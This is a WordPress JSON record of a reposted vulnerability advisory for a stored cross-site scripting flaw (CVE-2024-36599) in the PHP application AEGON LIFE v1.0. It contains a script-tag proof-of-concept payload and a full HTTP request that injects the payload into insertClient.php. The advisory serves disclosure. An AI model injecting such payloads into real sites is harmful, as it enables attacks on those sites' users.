{"id":57501,"date":"2024-06-14T17:50:19","date_gmt":"2024-06-14T14:50:19","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179088\/aegonlife10-xss.txt"},"modified":"2024-06-14T17:50:19","modified_gmt":"2024-06-14T14:50:19","slug":"aegon-life-1-0-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/aegon-life-1-0-cross-site-scripting\/","title":{"rendered":"AEGON LIFE 1.0 Cross Site Scripting"},"content":{"rendered":"<p># Exploit Title: Life Insurance Management Stored System- cross-site scripting (XSS)<br \/># Exploit Author: Aslam Anwar Mahimkar<br \/># Date: 18-05-2024<br \/># Category: Web application<br \/># Vendor Homepage: https:\/\/projectworlds.in\/<br \/># Software Link: https:\/\/projectworlds.in\/life-insurance-management-system-in-php\/<br \/># Version: AEGON LIFE v1.0<br \/># Tested on: Linux<br \/># CVE: CVE-2024-36599<\/p>\n<p># Description:<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;-<\/p>\n<p>A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php.<\/p>\n<p># Payload:<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;-<\/p>\n<p>&lt;script&gt;alert(document.domain)&lt;\/script&gt;<\/p>\n<p># Attack Vectors:<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<\/p>\n<p>To exploit this vulnerability, use &lt;script&gt;alert(document.domain)&lt;\/script&gt; in the name parameter; when a user visits Client.php, the XSS is triggered.<\/p>\n<p># Burp Suite Request:<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<\/p>\n<p>POST \/lims\/insertClient.php HTTP\/1.1<br \/>Host: localhost<br \/>Content-Length: 30423<br \/>Cache-Control: max-age=0<br \/>sec-ch-ua: &#8220;Not-A.Brand&#8221;;v=&#8221;99&#8243;, &#8220;Chromium&#8221;;v=&#8221;124&#8243;<br \/>sec-ch-ua-mobile: ?0<br \/>sec-ch-ua-platform: &#8220;Linux&#8221;<br \/>Upgrade-Insecure-Requests: 1<br \/>Origin: 
http:\/\/localhost<br \/>Content-Type: multipart\/form-data; boundary=&#8212;-WebKitFormBoundarymKfAe0x95923LzQH<br \/>User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/124.0.6367.60 Safari\/537.36<br \/>Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7<br \/>Sec-Fetch-Site: same-origin<br \/>Sec-Fetch-Mode: navigate<br \/>Sec-Fetch-User: ?1<br \/>Sec-Fetch-Dest: document<br \/>Referer: http:\/\/localhost\/lims\/addClient.php<br \/>Accept-Encoding: gzip, deflate, br<br \/>Accept-Language: en-US,en;q=0.9<br \/>Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n<br \/>Connection: close<\/p>\n<p>&#8212;&#8212;WebKitFormBoundarymKfAe0x95923LzQH<br \/>Content-Disposition: form-data; name=&#8221;client_id&#8221;<\/p>\n<p>1716051159<\/p>\n<p>&#8212;&#8212;WebKitFormBoundarymKfAe0x95923LzQH<br \/>Content-Disposition: form-data; name=&#8221;client_password&#8221;<\/p>\n<p>password<\/p>\n<p>&#8212;&#8212;WebKitFormBoundarymKfAe0x95923LzQH<br \/>Content-Disposition: form-data; name=&#8221;name&#8221;<\/p>\n<p>&lt;script&gt;alert(document.domain)&lt;\/script&gt;<\/p>\n<p>&#8212;&#8212;WebKitFormBoundarymKfAe0x95923LzQH<br \/>Content-Disposition: form-data; name=&#8221;fileToUpload&#8221;; filename=&#8221;runme.jpg_original&#8221;<\/p>\n<p>Content-Type: application\/octet-stream<\/p>\n<p>\u00ff\u00d8\u00ff\u00e0<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Life Insurance Management Stored System- cross-site scripting (XSS)# Exploit Author: Aslam Anwar Mahimkar# Date: 18-05-2024# Category: Web application# Vendor Homepage: https:\/\/projectworlds.in\/# Software Link: https:\/\/projectworlds.in\/life-insurance-management-system-in-php\/# Version: AEGON LIFE v1.0# Tested on: Linux# CVE: CVE-2024-36599 # Description:&#8212;&#8212;&#8212;&#8212;&#8212;- A stored cross-site scripting (XSS) vulnerability in Aegon 
Life v1.0 allows attackers to execute arbitrary web scripts &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57501","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57501","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57501"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57501\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57501"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57501"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57501"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}